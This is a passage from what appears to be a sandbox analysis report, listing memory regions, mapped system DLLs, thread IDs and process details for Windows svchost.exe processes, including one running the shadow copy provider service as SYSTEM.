"c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 446 start_va = 0x1370000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 447 start_va = 0x1470000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 448 start_va = 0x1600000 end_va = 0x167ffff entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 449 start_va = 0x16b0000 end_va = 0x172ffff entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 450 start_va = 0x1790000 end_va = 0x180ffff entry_point = 0x0 region_type 
= private name = "private_0x0000000001790000" filename = "" Region: id = 451 start_va = 0x1870000 end_va = 0x18effff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 452 start_va = 0x1930000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 453 start_va = 0x1960000 end_va = 0x19dffff entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 454 start_va = 0x1aa0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 455 start_va = 0x1bb0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 456 start_va = 0x1bc0000 end_va = 0x1c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 457 start_va = 0x1c40000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 458 start_va = 0x1cc0000 end_va = 0x1d7ffff entry_point = 0x1cc0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 459 start_va = 0x1db0000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 460 start_va = 0x1eb0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 461 start_va = 0x1f30000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 462 start_va = 0x1fb0000 end_va = 0x21affff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 463 start_va = 0x2230000 end_va = 0x22affff 
entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 464 start_va = 0x23b0000 end_va = 0x242ffff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 465 start_va = 0x73f90000 end_va = 0x73f92fff entry_point = 0x73f90000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 466 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 467 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 468 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 469 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 470 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 471 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 472 start_va = 0xfff20000 end_va = 0xfff2afff entry_point = 0xfff20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 473 start_va = 0x7fef4b90000 end_va = 0x7fef4ba7fff entry_point = 0x7fef4b90000 region_type = mapped_file name = "vmictimeprovider.dll" filename = 
"\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 474 start_va = 0x7fef4bb0000 end_va = 0x7fef4c0ffff entry_point = 0x7fef4bb0000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 475 start_va = 0x7fef69e0000 end_va = 0x7fef69ebfff entry_point = 0x7fef69e0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 476 start_va = 0x7fef6a30000 end_va = 0x7fef6b07fff entry_point = 0x7fef6a30000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 477 start_va = 0x7fef6d60000 end_va = 0x7fef6d67fff entry_point = 0x7fef6d60000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 478 start_va = 0x7fef6d70000 end_va = 0x7fef6de3fff entry_point = 0x7fef6d70000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 479 start_va = 0x7fef7b60000 end_va = 0x7fef7b78fff entry_point = 0x7fef7b60000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 480 start_va = 0x7fef7b80000 end_va = 0x7fef7b8ffff entry_point = 0x7fef7b80000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 481 start_va = 0x7fef7b90000 end_va = 0x7fef7ba1fff entry_point = 0x7fef7b90000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") 
Region: id = 482 start_va = 0x7fef7d00000 end_va = 0x7fef7d63fff entry_point = 0x7fef7d00000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 483 start_va = 0x7fef7d70000 end_va = 0x7fef7de0fff entry_point = 0x7fef7d70000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 484 start_va = 0x7fef8860000 end_va = 0x7fef88dbfff entry_point = 0x7fef8860000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 485 start_va = 0x7fefaef0000 end_va = 0x7fefaf07fff entry_point = 0x7fefaef0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 486 start_va = 0x7fefaf10000 end_va = 0x7fefaf20fff entry_point = 0x7fefaf10000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 487 start_va = 0x7fefafe0000 end_va = 0x7fefb032fff entry_point = 0x7fefafe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 488 start_va = 0x7fefb110000 end_va = 0x7fefb119fff entry_point = 0x7fefb110000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 489 start_va = 0x7fefb130000 end_va = 0x7fefb13afff entry_point = 0x7fefb130000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 490 start_va = 0x7fefb140000 end_va = 0x7fefb166fff entry_point = 0x7fefb140000 region_type = 
mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 491 start_va = 0x7fefb1c0000 end_va = 0x7fefb226fff entry_point = 0x7fefb1c0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 492 start_va = 0x7fefb240000 end_va = 0x7fefb24bfff entry_point = 0x7fefb240000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 493 start_va = 0x7fefb300000 end_va = 0x7fefb314fff entry_point = 0x7fefb300000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 494 start_va = 0x7fefb990000 end_va = 0x7fefb9a8fff entry_point = 0x7fefb990000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 495 start_va = 0x7fefb9b0000 end_va = 0x7fefb9c4fff entry_point = 0x7fefb9b0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 496 start_va = 0x7fefba30000 end_va = 0x7fefba3afff entry_point = 0x7fefba30000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 497 start_va = 0x7fefbbb0000 end_va = 0x7fefbbc7fff entry_point = 0x7fefbbb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 498 start_va = 0x7fefc970000 end_va = 0x7fefc97bfff entry_point = 0x7fefc970000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: 
"c:\\windows\\system32\\version.dll") Region: id = 499 start_va = 0x7fefca40000 end_va = 0x7fefca46fff entry_point = 0x7fefca40000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 500 start_va = 0x7fefcb30000 end_va = 0x7fefcb4afff entry_point = 0x7fefcb30000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 501 start_va = 0x7fefcb50000 end_va = 0x7fefcb6dfff entry_point = 0x7fefcb50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 502 start_va = 0x7fefcca0000 end_va = 0x7fefcca9fff entry_point = 0x7fefcca0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 503 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 504 start_va = 0x7fefce90000 end_va = 0x7fefcebffff entry_point = 0x7fefce90000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 505 start_va = 0x7fefcec0000 end_va = 0x7fefcf1afff entry_point = 0x7fefcec0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 506 start_va = 0x7fefd030000 end_va = 0x7fefd036fff entry_point = 0x7fefd030000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 507 start_va = 0x7fefd040000 end_va = 0x7fefd094fff 
entry_point = 0x7fefd040000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 508 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 509 start_va = 0x7fefd340000 end_va = 0x7fefd353fff entry_point = 0x7fefd340000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 510 start_va = 0x7fefd640000 end_va = 0x7fefd64afff entry_point = 0x7fefd640000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 511 start_va = 0x7fefd670000 end_va = 0x7fefd694fff entry_point = 0x7fefd670000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 512 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 513 start_va = 0x7fefd6b0000 end_va = 0x7fefd740fff entry_point = 0x7fefd6b0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 514 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 515 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff entry_point = 0x7fefd7b0000 region_type = mapped_file name = "profapi.dll" filename = 
"\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 516 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 517 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 518 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 519 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 520 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 521 start_va = 0x7fefdef0000 end_va = 0x7fefdef7fff entry_point = 0x7fefdef0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 522 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 523 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 524 start_va = 0x7feff0f0000 end_va = 
0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 525 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 526 start_va = 0x7feff4e0000 end_va = 0x7feff550fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 527 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 528 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 529 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 530 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 531 start_va = 0x7feffb20000 end_va = 0x7feffb6cfff entry_point = 0x7feffb20000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 532 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 533 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 534 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 535 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 536 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 537 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 538 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 539 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 540 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 541 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 542 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 543 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 544 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 545 start_va = 
0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 546 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 547 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 548 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 549 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 550 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 18 os_tid = 0x8ac Thread: id = 19 os_tid = 0x554 Thread: id = 20 os_tid = 0x6ec Thread: id = 21 os_tid = 0x730 Thread: id = 22 os_tid = 0x7ac Thread: id = 23 os_tid = 0x7a8 Thread: id = 24 os_tid = 0x780 Thread: id = 25 os_tid = 0x77c Thread: id = 26 os_tid = 0x758 Thread: id = 27 os_tid = 0x754 Thread: id = 28 os_tid = 0x61c Thread: id = 29 os_tid = 0x158 Thread: id = 30 os_tid = 0x154 Thread: id = 31 os_tid = 0x130 Thread: id = 32 os_tid = 0x12c Thread: id = 33 os_tid = 0x11c Thread: id = 42 os_tid = 0x54c Thread: id = 59 os_tid = 0x7f4 Thread: id = 64 os_tid = 0x8f4 Thread: id = 66 os_tid = 0x8e0 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x214f1000" os_pid = "0x9e0" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x9b8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" 
[0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005361e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 554 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 555 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 556 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 557 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 558 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 559 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 560 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 561 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 562 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 563 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 564 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 565 start_va = 0x250000 end_va = 
0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 566 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 567 start_va = 0x570000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 568 start_va = 0x600000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 569 start_va = 0x680000 end_va = 0x73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 570 start_va = 0x740000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 571 start_va = 0x7f0000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 572 start_va = 0x870000 end_va = 0xb3efff entry_point = 0x870000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 573 start_va = 0xb40000 end_va = 0xcc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 574 start_va = 0xcd0000 end_va = 0xe50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 575 start_va = 0xe60000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 576 start_va = 0x1320000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 577 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = 
"\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 578 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 579 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 580 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 581 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 582 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 583 start_va = 0xfff20000 end_va = 0xfff2afff entry_point = 0xfff20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 584 start_va = 0x7fef45e0000 end_va = 0x7fef4661fff entry_point = 0x7fef45e0000 region_type = mapped_file name = "swprv.dll" filename = "\\Windows\\System32\\swprv.dll" (normalized: "c:\\windows\\system32\\swprv.dll") Region: id = 585 start_va = 0x7fef7e80000 end_va = 0x7fef7e96fff entry_point = 0x7fef7e80000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 586 start_va = 0x7fef9000000 end_va = 0x7fef9013fff entry_point = 0x7fef9000000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 587 start_va = 0x7fef9020000 end_va = 0x7fef9029fff 
entry_point = 0x7fef9020000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 588 start_va = 0x7fef9070000 end_va = 0x7fef9078fff entry_point = 0x7fef9070000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 589 start_va = 0x7fefb260000 end_va = 0x7fefb278fff entry_point = 0x7fefb260000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 590 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 591 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 592 start_va = 